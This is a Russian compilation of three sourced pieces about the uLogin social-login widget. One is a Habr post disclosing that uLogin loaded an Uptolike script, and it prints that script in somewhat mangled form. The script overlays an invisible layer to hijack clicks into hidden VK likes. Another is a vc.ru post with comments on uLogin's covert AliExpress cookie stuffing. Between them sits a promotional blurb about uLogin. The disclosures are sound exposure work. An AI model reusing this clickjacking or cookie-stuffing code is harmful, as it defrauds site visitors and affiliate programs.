Будет немного сумбурно, но все же по делу.
Рассказ пойдет о красном квадрате малевича, о uLogin и о сервисе социальной активности для набора лайков.
Все началось с того, что ковыряясь в одном из своих проектов, наткнулся на красный квадрат Малевича — кодовое название накруточного слоя для лайков в соц сети, выглядело примерно так:
Поняв, что дело неладное, т.к. таких скриптов не ставил, полез искать шалуна.
Для начала набрел на некий скрипт, лежащий по адресу:
w.uptolike.com/widgets/v1/extra.js?rnd=903182 (далее Скрипт Uptolike)
Конечно, посетовав на нашего СЕО-специалиста, полез в админ-панель и в код сайта с поиском когда и кто успел прописать данный скрипт. Как Вы и предполагаете — ничего не нашел. Дальше — проще. Нужно найти кто же нам подсовывает этот скрипт. Искать долго не пришлось — это многими любимый uLogin:
Как посмотреть историю активности Вконтакте, и список входов на страницу?
Теперь пойдем в тех особенности.
Скрипт Uptolike не всегда выдает себя. Вот здоровый скрипт, показавший себя сразу же при пробе повторить эксперимент с накрутками:
Здоровый скрипт
(function() < (function () < if (!window[«__utl_adbl_initialized»]) < window[«__utl_adbl_initialized»] = true; >else < return; >var body = document.getElementsByTagName(«body»)[0]; var img = document.createElement(«img»); img.src = «//w.uptolike.com/widgets/v1/det_dbl?rnd=»+Math.random()+»; img.style.position = «absolute»; img.style.top = «-100px»; img.style.left = «-100px»; img.style.width = «1px»; img.style.height = «1px»; setTimeout(function() , 2000); body.appendChild(img); >)();>)();
Вот скрипт курильщика, который случайно попался на глаза от Uptolike:
Скрипт курильщика
(function() < (function () < if (!window[«__utl_adbl_initialized»]) < window[«__utl_adbl_initialized»] = true; >else < return; >var body = document.getElementsByTagName(«body»)[0]; var img = document.createElement(«img»); img.src = «//w.uptolike.com/widgets/v1/det_dbl?rnd=»+Math.random()+»; img.style.position = «absolute»; img.style.top = «-100px»; img.style.left = «-100px»; img.style.width = «1px»; img.style.height = «1px»; setTimeout(function() , 2000); body.appendChild(img); >)();(function() < function addScript(url) < var el = document.createElement(«script»); el.type = «text/javascript»; el.charset = ‘utf-8’; el.async = ‘true’; el.src = url; el.isLoaded = false; document.getElementsByTagName(‘head’)[0].appendChild(el); >if (window.location.protocol==’https’) < return; >if (!window[«__utl_clkj_initialized»]) < window[«__utl_clkj_initialized»] = true; >else < return; >function install() < var cleaning = false; var lastClickedElement; var body = document.getElementsByTagName(«body»)[0]; var div = document.createElement(«div»); div.style.position = «absolute»; div.style.width = «1px»; div.style.height = «1px»; div.style.top = «-1px»; div.style.left = «-1px»; div.style.zIndex = «10000»; div.innerHTML ; body.appendChild(div); var el = document.getElementById(«__smth_wrap1»); var mousemove = function(e) < var x = e.clientX, y = e.clientY; div.style.zIndex = «-1»; var element = document.elementFromPoint(x, y); div.style.zIndex = «10000»; if (element.nodeName == «A» || element.parentNode.nodeName == «A») < div.style.display = «block»; el.style.left = (e.pageX — 10) + «px»; el.style.top = (e.pageY — window.scrollY — 12) + «px»; lastClickedElement = element; >else < lastClickedElement = undefined; div.style.display = «none»; >>; var clickListener = function(e) < setTimeout(function() < cleanup(); >, 100); >; document.addEventListener(«mouseup», clickListener); function init(msg) < if (cleaning) < return; >if (msg msg.data[«context»]===»stggr») < if (msg.data[«action»] === «init») < if (cleaning) < return; >setTimeout(function() < if (cleaning) < return; >div.style.width = «100%»; div.style.height = «100%»; div.style.top = «0»; div.style.left = «0»; window.addEventListener(«mousemove», mousemove); >, 1000); > else if (msg.data[«action»] === «clean») < cleanup(); >else if (msg.data[«action»] === «got») < var img = document.createElement(«img»); img.src = «//w.uptolike.com/widgets/v1/vk_clk?rnd=»+Math.random(); img.style.position = «absolute»; img.style.top = «-100px»; img.style.left = «-100px»; img.style.width = «1px»; img.style.height = «1px»; img.onLoad = function() < clickOnce(); >setTimeout(function() , 2000); body.appendChild(img); var clicked = false; var clickOnce = function() < if (clicked) return; if (lastClickedElement) < lastClickedElement.click(); clicked = true; >> setTimeout(clickOnce, 500); cleanup(); > > > if (window.addEventListener) < window.addEventListener(«message», init, false); >else < window.attachEvent(«onmessage», init); >var cleanup = function () < cleaning = true; window.removeEventListener(«mousemove», mousemove); document.removeEventListener(«mouseup», clickListener); document.removeEventListener(«message», init) body.removeChild(div); >; > install(); >)()>)();
- Создает невидимый слой, который отображается при наведении на ссылки
- Ловит клик и сматывает удочки
Содержимое iframe
var debug = false; function log(e) < if (debug window[«console»]) < console.log(e); >> function initialize() < var body = document.getElementsByTagName(«body»)[0]; VK.init(); VK.Widgets.Auth(«_smth__vk_auth», , «*»); >, onReady: function () < log(«VK widget ready»); window.parent.postMessage(, «*»); >>); setTimeout(function() < var wrapper = document.getElementById(«wrapper»); var h = wrapper.clientHeight; if (h<90) < log(«Unauthorized (iframe height: «+h+»px)»); document.body.removeChild(wrapper) window.parent.postMessage(, «*»); > else < log(«Authorized»); wrapper.removeChild(document.getElementById(«_smth__vk_auth»)); VK.Observer.subscribe(«widgets.like.liked», function() < log(«like clicked»); window.parent.postMessage(, «*»); >); VK.Observer.subscribe(«widgets.like.unliked», function() < log(«unlike clicked»); window.parent.postMessage(, «*»); >); VK.Widgets.Like(«_smth_vk_like», ); var rm = setInterval(function() < if (document.querySelector) < var iframe = document.querySelector(«body >iframe»); if (iframe) < document.body.removeChild(iframe); log(«cleared iframe»); clearInterval(rm); >> >, 50); // wrapper.style.top = «-75px»; wrapper.style.left = «-25px»; > >, 2000); > #wrapper < position:absolute; top:0; left:-210px; /*top:-75px;*/ /*left:-15px; */ width: 100px; >
Ссылки на ресурсы можно взять из кода. И да, это пример того, как современные «особенности» используются в современном «СЕО».
Источник: habr.com
uLogin: что это за приложение в Одноклассниках и ВКонтакте?
ULogin – это удобный инструмент, созданный специально для входа на любые ресурсы. С помощью его пользователи имеют возможность получить единый доступ к Интернет-платформам без повторной процедуры регистрации, а владельцы сайтов – приобретают максимальный приток клиентов из социальных сетей и распространенных порталов (Google, Яндекс, Mail.ru, ВКонтакте, Facebook и др.).
Приложение имеет понятный интерфейс, где предлагает выбрать платформу, отметить нужные сервисы, изменять порядок и предпочтение вывода. В обратной строке вставляется ссылка на определенный сайт, далее код для вставки в страницу логина, который размещается по нужному адресу. Такие сервисы, как Одноклассники, ВКонтакте, Фейсбук, Майл.ру выводятся сразу, а большинство ресурсов выводятся при наведении курсора.
Плюсы для пользователей и владельцев сайтов
- С помощью приложения получают возможность заходить на любые ресурсы без регистрации.
- Приложение обеспечивает безопасность доступа ко всем учетным записям, а также гарантирует конфиденциальность личных данных.
- Пользователи самостоятельно выбирают удобный способ идентификации (через зарегистрированные соцсети).
Для владельцев сайтов преимущества также очевидны:
- Установка легко и быстро настраивается и управляется виджетом.
- Поддержание разнообразных способов авторизации клиентов.
- Получение дополнительного притока клиентов из соцсетей.
- Предоставление данных в едином формате – АPI.
- Возможность получения адреса электронной почты, номера мобильного телефона и других данных о пользователе.
Как настроить ULogin
Выполнить это можно несколькими способами:
- Указать адрес редиректа, и заполнить поле адреса обратной ссылки – http:уour-sife.ru. Можно указать главную страницу ресурса со ссылкой. Она будет самостоятельно направлять на нужную страницу, с которой была пройдена авторизация.
- Разместить виджет.
Во время генерации кода, важно разместить его на всех страницах ресурса, где пользователь сможет его увидеть. Код его также отображает, но, если настройки будут изменяться, он будет автоматически генерироваться.
На страничке указать код, выполняющий запрос по адресу: https://ulogin.ru/token.php. Он передает в параметрах полученный ранее token и host (домен ресурса).
- Зарегистрировать пользователя. Однако, если на сайте не предусмотрена регистрация, то функции кода будут ограничены.
Источник: list-name.ru
Как uLogin зарабатывает на каждом посетителе вашего сайта
Привет. Я маркетолог проекта loading.express, и мы ускоряем сайты.
20 367 просмотров
Сегодня, в процессе ускорения сайта, наткнулись на такой милый «лайфхак» от uLogin, который приносит компании сотни тысяч рублей, а может и больше.
Если вы не знаете, uLogin — сервис, который помогает сделать авторизацию в личный кабинет вашего сайта через социальные сети. Сервис бесплатен, а потому, уже с 2011-го по 2012 год, его поставили к себе на сайты более 10 тысяч веб-мастеров, по утверждению владельцев.
Заходим на страницу и поиском ищем ulogin-stats.ru:
Исходный код скрипта виджета авторизации содержит ссылку на вставку реферальной ссылки Aliexpress
В разделе техподдержки сервиса уже есть замечание про этот скрипт, но техподдержка ответила, что ничего такого не делает.
Хитрый ответ техподдержки, в ulogin.js и правда нет ничего подобного
Что вообще всё это значит
Любой посетитель, который пришёл на ваш сайт, подгружает себе страницу Aliexpress, сам того не зная. В Aliexpress идёт запись, что этот посетитель пришёл по рекомендации uLogin.
И теперь uLogin получит комиссионные с его покупки! Сколько можно заработать? Вот какие проценты выплачивает CPA-сеть Admitad:
Скриншот из кабинета Admitad
Считаем чужие деньги
Если взять посещаемость на каждом сайте хотя бы в 300 посетителей, в сутки получаем 3 млн рефералов. Если учесть, что время cookie — три дня, то из 9 млн реферальных посетителей с вероятностью 0,1% покупки совершат 9000.
Если средний чек Aliexpress — 300 рублей, оборот реферала — 2,7 млн рублей. 3% выплаты от оборота — 81 тысяча рублей за три дня.
Классный ход! И это очень пессимистичный расчёт.
Если вы ставите чужой виджет на свой сайт, в любой момент этот сервис может включить рекламу, редирект, перехват заявок с форм, считывание любой персональной информации о ваших посетителях!
Особенно это касается бесплатных сервисов вроде uLogin. Будьте бдительны и внимательно проверяйте, что загружается на вашем сайте прямо сейчас.
И, конечно, любой внешний код в вашем сайте замедляет скорость загрузки. Настоятельно рекомендуем подгружать все коды асинхронно и в отложенной загрузке. Откладывайте всё что можно. Чат, пиксели ретаргета и другие внешние ресурсы.
Делайте это смело, ведь у вас не будет другого шанса произвести первое впечатление. Впечатляйте посетителей быстрой загрузкой.
Высоких вам конверсий и безопасных виджетов!
Показать ещё
129 комментариев
Написать комментарий.
Тот случай, когда понимаешь, что мог бы запилить что-то подобное, но ты недостаточно испорчен и поэтому такие идеи просто не появляются в голове. :-
Развернуть ветку
Я однажды где-то выложил кусок кода со своей рефералкой — не специально, просто как пример того, как можно вставить рефералку. Несколько месяцев капали комиссионные, люди тупо скопировали код не заменили ID на свой.
Было одновременно смешно и стыдненько (то ли за них, то ли за себя)
Развернуть ветку
1 комментарий
Когда устанавливаешь полностью бесплатный плагин, первое, что должно возникнуть в голове — «почему это бесплатно? Как они зарабатывают?»
И после нахождения ответа принимать решение, готов ты идти на такое или нет.
Развернуть ветку
16 комментариев
Тот случай, когда понимаешь, что мог бы запилить что-то подобное
Так этой теме 100 лет в обед, и в свое время из-за нее Алиэкспресс сильно резал условия по партнерской программе, сокращая время жизни партнерских кук до одной сессии.
Развернуть ветку
1 комментарий
Развернуть ветку
Меня умиляют люди, которые искренне считают, что бывает что-то бесплатно.
Они же искренне считают тот же google и facebook бесплатным.
Развернуть ветку
1 комментарий
У них в пользовательском соглашении написано, что они могут использовать партнеров для вставки рекламы, что вас не устроило?
Представьте, сколько денег уходит на поддержку работоспособности такого большого и БЕСПЛАТНОГО сервиса. По-вашему, они должны бесплатно это все делать и сервера из своего кармана оплачивать? Вы же не ускоряете сайты бесплатно, верно?
Развернуть ветку
Я и сам не особо против был бы, но эта штуковина тормозит загрузку сайта! Понимаете. Пусть вставляют что угодно, имеют право юридически, но если это вредит, то это уже так себе оправдание.
Развернуть ветку
7 комментариев
У них в пользовательском соглашении написано, что они могут использовать партнеров для вставки рекламы, что вас не устроило?
Так они же не рекламу вставляют.
По факту они кидают Али на деньги, потому что им платят за лиды, которых нет на самом деле.
Развернуть ветку
Мы в admitad уже несколько раз присылали детект этого партнера рекламодателю, хотя он работает с официальной партнеркой Aliexpress, а не через Admitad — это видно по ссылке
Развернуть ветку
Как написать детект на этих товарищей обычным смертным? Хочу написать, но не понимаю как.
Развернуть ветку
11 комментариев
Радуйтесь, что там не рефер от роскомнадзора.
Развернуть ветку
Нормальные CPA должны банить за кукистафинг. А для тех, кто кудахчет о том, что «зато бесплатно и вообще читайте соглашение», стоит пояснить что на момент когда вы попадаете на страницу с виджетом Ulogin у вас уже может стоять партнерская кука от другого партнера.
И если провести аналогию из жизни, то выглядит это след. образом:
Вы (рекламодатель у которого есть трафик) заехали на АЗС оплатили бензин, взали пистолет, но льете не в бензобак, а в канистру, которую вам подставили «ушлые» ребята из Ulogin.
Или другая аналогия, когда вы (вебмастер) работаете, а зарплату в конце месяца на карту получает другой человек лишь потому что ему хватило ума подменить номер вашего счета на свой
¯_(ツ)_/¯
Чистой воды мошенничество перед партнером, перед CPA. Перед пользователем, установившим виджет может и всё гладко с точки зрения закона, но если те, кто оправдывают такие действия завтра сами начнуть продавать трафик и столкнуться с кукистафингом, станут думать иначе))))
Развернуть ветку
А если бы они просто новую вкладку открывали с магазином по cpa, как делал rutor ?
Развернуть ветку
5 комментариев
Ваша аналогия не верна. Правильно было бы сказать — вы, постоянный клиент АЗС, приехали заправляться, оплатили, а тут какой-то посторонний парень вылез и говорит кассиру — это я привел партнера, дай мне денежку. Вы не страдаете, ваша машина не страдает. А вот АЗС — да.
Развернуть ветку
Проект есть на GitHub и там нет даже намёка на Али, но он посылает запрос на стороннюю либу, который и делает что хочет. Хитро
Развернуть ветку
Хитро не то слово. Я прям кайфанул от идеи. Но осадок не очень. Явно у ребят сотня тысяч веб-мастеров есть уже. Представьте объемы какие на самом деле.
Развернуть ветку
Развернуть ветку
Кукистафинг и невидимый iframe — за это, как правило, в партнёрских программах банят без возможности вывода средств.
Развернуть ветку
Вот, я искал название. Куки-стаффинг!
Развернуть ветку
Опенсорсный. По кодексу.
Делает тоже самое. Только без подстав.
Ищу альфа самцов для бета тестирования 🙂
Развернуть ветку
Ну это финиш, написано или нет в соглашении не имеет значения, должно быть это явно, соглашения не читают 99% пользователей, это как подпись мелким шрифтом снизу, вы же согласились? Всё должно быть максимально прозрачно.
Развернуть ветку
И зря не читают
Развернуть ветку
5 комментариев
Пользуясь случаем — на носу распродажа 1111. Конверсия в этот день просто стреляет — данные из 2018 года на картинке. Заработок веб-мастеров соответственно тоже взлетает, но только честных веб-мастеров).
Развернуть ветку
Вот они и заработают ))
Развернуть ветку
3 комментария
Если бы автор сам допёр, чтобы сделать такой «сервис», этой статьи вы бы никогда не увидели.
Развернуть ветку
Почему не увидели? На хабре есть статьи про uLogin, там четко написано, что эти ребята редиректы делают, заявки перехватывают. А сделать такое же у себя на проекте — кто мешает? Делайте.
Развернуть ветку
Я думал он умер ещё лет 5 назад. А он, оказывается, живёт.
Развернуть ветку
Перестал им пользоваться, когда он сломался на пол года лет 5 назад.
Развернуть ветку
Не уловил какая польза от этого для Али? По идее они должны забанить такого реферала
Развернуть ветку
Партнера, а не реферала, если быть точнее в терминах. Вопрос объемов и антиспам алгоритмов Али, а так же менеджера, отвечающего за это
Развернуть ветку
К слову, есть немало менее технологичных воришек, которые воруют чужие лиды по похожей схеме, предлагая оплату за размещение их баннера. С условием, что баннер будет подгружаться скриптом. Понятное дело, что на самом деле их интересуют не баннерные показы, а внедрение скрипта, через который можно подгружать чужому трафику свои куки или сливать мобильных пользователей на вап-клик.
Не знаю кто на это ведется, но подобные предложения прилетают на почты от моих личных проектов регулярно. Так что видимо отклик есть. Письмо со скрина пришло сегодня утром, например.
Развернуть ветку
Развернуть ветку
Письма и от африканского принца приходят, но это не значит, что они работают 😉
Развернуть ветку
Куки стаффинг — старая тема. На этом поднимаются все партнёрские сети, так как они не борются активно со своими «партнёрами», занимающимися подобными вещами (им невыгодно сие, ибо они имеют свой %%). Именно поэтому многие отказываются от работы с партнёрскими сетями, а сырой трафик там по моей оценке на 90% состоит из такого или аналогичного «трафика».
Методов защиты от этого безобразия немало. Включая те, что можно сделать собственными руками. Я об этом много раз рассказывал, в книге писал и уроки у нас универе есть на эту тему.
Развернуть ветку
Тимофей, ну ты же знаешь что это не совсем так.
Вот недавний кейс от Мвидео и Кэшбеков, работающих через Admitad
https://vc.ru/admitad/65824-m-video-keshbek-uvelichil-chastotu-pokupok-v-poltora-raza
Развернуть ветку
1 комментарий
Ну вообще странно от бесплатного стороннего сервиса ожидать, что код не будет ничего делать. Хотя могли бы и признаться.
Развернуть ветку
Ну реально. Написали бы письмо. Предупреждение. Или хотя бы признались в ответе своей же техподдержки.
Развернуть ветку
7 комментариев
Молодцы ребята. Все участники процесса в выигрыше. Конечный пользователь получает удобную авторизацию, сервис получает небольшую денежку. По поводу чего рвутся пуканы, определенно непонятно.
Развернуть ветку
1. Вы разместили на своем ресурсе партнерскую ссылку на Алиэкспресс. Человек прошел по ней утром, заинтересовался товаром, но покупку решил совершить вечером. До вечера он перешел на какой-то сайт с Ulogin, который перебил вашу партнерскую куку своей. Когда человек вечером оформит заказ, то лид зачтут владельцам Ulogin. Этот лид они украли у вас.
2. Человек регулярно совершает покупки на Алиэкспрессе, заходя туда по прямой ссылке. Он зашел на какой-то сайт с Ulogin и ему подгрузили партнерскую куку. После этого он в очередной раз совершил прямой заход на Алиэкспресс и совершил там покупку, что засчиталось как лид владельцам Ulogin. Этот лид они украли у Алиэкспресса, «продав» им в качестве клиента того, кто являлся их клиентом и так.
3. Когда маркетологи Алиэкспресса посмотрят статистику и увидят сколько денег у них в этом квартале сперли куки-стафферы, то в очередной раз закрутят гайки по партнерской программе, в результате чего ее маржинальность снизится в разы для всех участников. В данном случае владельцы Ulogin ничего ни у кого не украли, а просто нагадили на общую поляну.
Источник: vc.ru